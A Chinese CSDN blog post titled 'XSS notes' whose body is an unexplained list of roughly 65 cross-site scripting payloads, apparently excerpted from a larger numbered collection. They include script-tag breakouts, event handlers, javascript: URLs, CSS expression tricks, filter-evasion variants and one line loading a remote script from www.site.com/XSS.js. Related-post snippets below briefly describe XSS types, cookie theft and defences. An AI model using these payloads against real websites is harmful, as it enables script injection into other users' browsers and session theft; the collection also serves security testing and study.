XSS笔记

已于 2023-11-08 09:54:52 修改
阅读量37 收藏
点赞数
文章标签: xss 网络 网络安全
于 2023-11-08 09:49:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53515309/article/details/134281840
版权 
"><script alert(1744))</script>
'">><script>alert(1745)</script>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(1746);\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(1747);\">
<script>1748 1748 = 1; alert(1748)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert(1749)")}</STYLE>
<?='<SCRIPT>alert(1750)</SCRIPT>'?>
" onfocus=alert(1751) "> <"
<FRAMESET><FRAME SRC=\"javascript:alert(1752);\"></FRAMESET>
<STYLE>li {list-style-image: url(\"javascript:alert(1753)\");}</STYLE><UL><LI>XSS
perl -e 'print \"<SCR\0IPT>alert(1754)</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(1755)>\";' > out
<br size=\"&{alert(1756)}\">
<scrscriptipt>alert(1757)</scrscriptipt>
</script><script>alert(1759)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1760)>
[color=red width=expression(alert(1761))][color]
<BASE HREF="javascript:alert(1762);//">
"></iframe><script>alert(1763)</script>
<body onLoad="while(true) alert(1764);">
'"></title><script>alert(1765)</script>
</textarea>'"><script>alert(1766)</script>
'""><script language="JavaScript"> alert(1767);</script>
</script></script><<<<script><>>>><<<script>alert(1768)</script>
<INPUT TYPE="IMAGE" SRC="javascript:alert(1769);">
'></select><script>alert(1770)</script>
a="get";b="URL";c="javascript:";d="alert(1771);";eval(a+b+c+d);
='><script>alert(1772)</script>
<body background=javascript:'"><script>alert(1773)</script>></body>
">/XaDoS/><script>alert(1774)</script><script src="http://www.site.com/XSS.js"></script>
">/KinG-InFeT.NeT/><script>alert(1775)</script>
!--" /><script>alert(1776);</script>
<script>alert(1777)</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(1778)</script>><marquee><h1>XSS by xss</h1></marquee>
'"></title><script>alert(1779)</script>><marquee><h1>XSS by xss</h1></marquee>
<img """><script>alert(1780)</script><marquee><h1>XSS by xss</h1></marquee>
<script>alert(1781)</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(1782)</script>"><script>alert("XSS by \nxss</h1></marquee>
'"></title><script>alert(1783)</script>><marquee><h1>XSS by xss</h1></marquee>
<iframe src="javascript:alert(1784);"></iframe><marquee><h1>XSS by xss</h1></marquee>
'><SCRIPT>alert(1785))</SCRIPT><img src="" alt='
"><SCRIPT>alert(1786))</SCRIPT><img src="" alt="
\'><SCRIPT>alert(1787))</SCRIPT><img src="" alt=\'
'); alert(1788); var x='
\\'); alert(1789);var x=\'
//--></SCRIPT><SCRIPT>alert(1790));
>"><ScRiPt%20%0a%0d>alert(1791)%3B</ScRiPt>
<SCRIPT> alert(1792); </SCRIPT>
<BODY ONLOAD=alert(1793)>
<BODY BACKGROUND="javascript:alert(1794)">
<IMG SRC="javascript:alert(1795);">
<IMG DYNSRC="javascript:alert(1796)">
<IMG LOWSRC="javascript:alert(1797)">
<INPUT TYPE="IMAGE" SRC="javascript:alert(1798);">
<LINK REL="stylesheet" HREF="javascript:alert(1799);">
<TABLE BACKGROUND="javascript:alert(1800)">
<TD BACKGROUND="javascript:alert(1801)">
<DIV STYLE="background-image: url(javascript:alert(1802))">
<DIV STYLE="width: expression(alert(1803));">
&apos;;alert(1804))//\&apos;;alert(1804))//&quot;;alert(1804))//\&quot;;alert(1804))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(1804))&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;alert(1805)&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;alert(1806))&lt;/SCRIPT&gt;
&lt;BASE HREF=&quot;javascript:alert(1807);//&quot;&gt;
&lt;BGSOUND SRC=&quot;javascript:alert(1808);&quot;&gt;
czqc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。
web漏扫-awvs漏扫软件-主要xss分析-运维安全awvs漏扫工具详细笔记
06-30
web漏扫-awvs漏扫软件-主要xss分析-运维安全awvs漏扫工具详细笔记
xss game挑战笔记.pdf
02-11
xss game挑战笔记
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击-运维安全详细笔记
Webgoat学习笔记.zip
03-12
Webgoat学习笔记
xss 笔记
LAngle9的博客
03-24 548
1,xss : 因为和css 冲突,改名字是xss,属于客户端攻击,网站管理员也是用户,攻击者盗取管理员的cookie,靠管理员身份作为“跳板”进行实施攻击。 XSS攻击最终目的是在网页中嵌入客户端恶意脚本代码,最常用的攻击代码是javascript语言,但也会使用其它的脚本语言 j avascript语言:是跨平台的,在jsp,php,asp,aspx,都可以使用 xss 用的脚本是可以构造的,有两千多种方法,要记者常用的函数就行 script, alert, img src 1.2 XS.
xss笔记
m0_73581247的博客
06-23 85
形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理: 输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;当你在浏览器的地址栏中输入以 "javascript:" 开头的 URL 或将其用于链接、表单提交等地方时,浏览器会直接执行其中的 JavaScript 代码。在存储型中输入的语句,是直接存储在数据库里面,危害最大。
XSS笔记分享
weixin_65386473的博客
01-15 2610
XSS 漏洞介绍 跨站脚本攻击(Cross Site Scripting),恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话 xss漏洞类型: 1.反射型 XSS 反射型XSS又称非持久性XSS,这种攻击往往具有一次性。 攻击者通过邮件等形式将包含XSS代码的链接发送给正常用户,当用户点击时,服务器接...
XSS笔记(简单了解的)
Fly_Mojito的博客
05-30 1234
XSS笔记
xss笔记总结
Long_gone的博客
10-21 175
普通注入 <script>alert(1)</script> 点击注入 "οnclick="alert(1) 创建链接 <a href="javascript:alert(1)">123</a> 点击创建输入框 <input onclick="alert(1)"> 插入图片 <img src="123" onerror="...
正确地防御XSS 笔记
Yisitelz的博客
08-02 229
如何正确防御XSS,首先需要理清XSS可能出现的场景及其解决方法;至于富文本的处理上也要下功夫;DOM型XSS与其他类型的XSS不同,需要特殊看待。
JS加密解密/XSS的防御
mxd01848的博客
06-03 994
总之,防御 XSS 攻击需要从多个角度进行考虑和处理,包括输入过滤、输出编码以及使用可靠的安全库和框架。通过多层次的防御策略,可以有效地提高应用程序的安全性。这段代码的目的是对用户输入进行过滤,以防止跨站脚本(XSS)攻击。让我们详细拆解这段代码,并分析其工作原理和有效性。怎么隐藏你的xss保护逻辑呢,使用在线js加解密工具对代码进行保护。是一个用于过滤 XSS 攻击的函数。函数进行过滤,然后返回过滤后的结果。进行解码,并将其传递给。最终返回过滤后的字符串。,表示需要过滤的输入。,则不进行后续操作。
使用pikachu Xss后台出现的问题
m0_74608722的博客
06-01 211
在进行xss-x漏洞实验的时候,一直出现上述错误,查找了很多,终于找到问题所在pikachu使用的数据库为同一个数据库,千万别被pkxss误导,以为pikachu还有一个数据库为pkxss,所以在配置的时候写下如下图的
DVWA-XSS(DOM)
y06_z
06-03 512
2.过滤输入的字符,例如 “ ’ ”,“ " ”,“<”,“>” 等非法字符;后端没有代码,点击select按钮动作是前端的JS代码进行处理的。观察后端代码进行了<script和大小写过滤,这里考虑闭合绕过。后,观察页面源码发现payload被插入到了前端界面中执行。但是可以通过注释符#绕过,注释符后面的内容不会发送到服务器。我们点击select之后,在URL后面加入。按之前Low level注入的话,结果如下。3.对输入到页面的数据进行编码。后端没有代码,观察前端代码。将payload改为。
XSS 跨站脚本攻击预防(文件上传)
陌守
06-03 218
可以根据需求自定义,改造为拦截器、或者 AOP 等方式实现。
DVWA-XSS(Reflected)
y06_z
06-04 644
反射型XSS可以用来窃取cookie。
安全测试 之 安全漏洞 :XSS
最新发布
Orange_hhh的博客
06-04 327
反射型XSS发生在恶意脚本作为参数直接包含在请求的URL中,然后由服务器动态地包含在响应页面里返回给客户端。用户需要点击一个包含恶意链接的URL才会触发攻击。存储型XSS则是将恶意脚本提交到服务器(例如,通过表单提交或评论区),并且存储在服务器的数据库或文件系统中。当其他用户访问包含此恶意脚本的页面时,脚本将从服务器取出并执行。
XSS Challenges 闯关游戏环境准备:深入指南
weixin_43822401的博客
06-03 471
XSS Challenges 闯关游戏旨在通过模拟真实场景,让学习者体验XSS攻击的检测、防御和修复过程。准备工作主要包括代理工具的配置和HTTPS流量的捕获。通过上述步骤,学习者可以成功配置XSS Challenges的实验环境。准备过程中,学习者将了解如何使用代理工具捕获网络流量,这是理解和防御XSS攻击的关键技能。XSS Challenges 闯关游戏不仅提供了一个实践XSS攻防技能的平台,还帮助学习者理解Web应用程序安全的深层概念。
xss cookie劫持
07-25
回答: XSS(跨站脚本)Cookie劫持是一种攻击技术,攻击者通过在网站中插入恶意代码,当用户访问带有恶意代码的网站时,会将用户的Cookie发送给攻击者。攻击者获取到用户的Cookie后,可以使用该Cookie进行登录。\[1\] 具体的攻击过程如下: 1. 攻击者发现目标网站存在XSS漏洞,并编写恶意代码。 2. 当用户访问带有恶意代码的网站时,恶意代码会将用户的Cookie发送给攻击者。 3. 攻击者获取到用户的Cookie后,可以使用该Cookie进行登录。 为了实现这种攻击,攻击者通常会在目标网站中插入恶意代码,例如通过修改网页源代码或者利用存储型XSS漏洞。一旦用户访问了带有恶意代码的网站,攻击者就可以获取到用户的Cookie,并利用该Cookie进行登录。\[2\]\[3\] 为了防止XSS Cookie劫持攻击,网站开发者应该采取以下措施: 1. 对用户输入进行严格的过滤和验证,避免恶意代码的插入。 2. 使用安全的编程语言和框架,避免常见的XSS漏洞。 3. 设置HttpOnly标志,限制Cookie只能通过HTTP协议传输,防止被JavaScript获取。 4. 使用HTTPS协议传输Cookie,确保通信的安全性。 5. 定期更新和升级网站的安全措施,及时修复已知的漏洞。 总之,XSS Cookie劫持是一种常见的攻击技术,攻击者通过在网站中插入恶意代码获取用户的Cookie,并利用该Cookie进行登录。为了防止这种攻击,网站开发者应该采取相应的安全措施。 #### 引用[.reference_title] - *1* *3* [web安全学习笔记(八) XSS之cookie劫持](https://blog.csdn.net/qycc3391/article/details/104692115)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [XSS盗取cookie](https://blog.csdn.net/qq_43776408/article/details/107606970)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值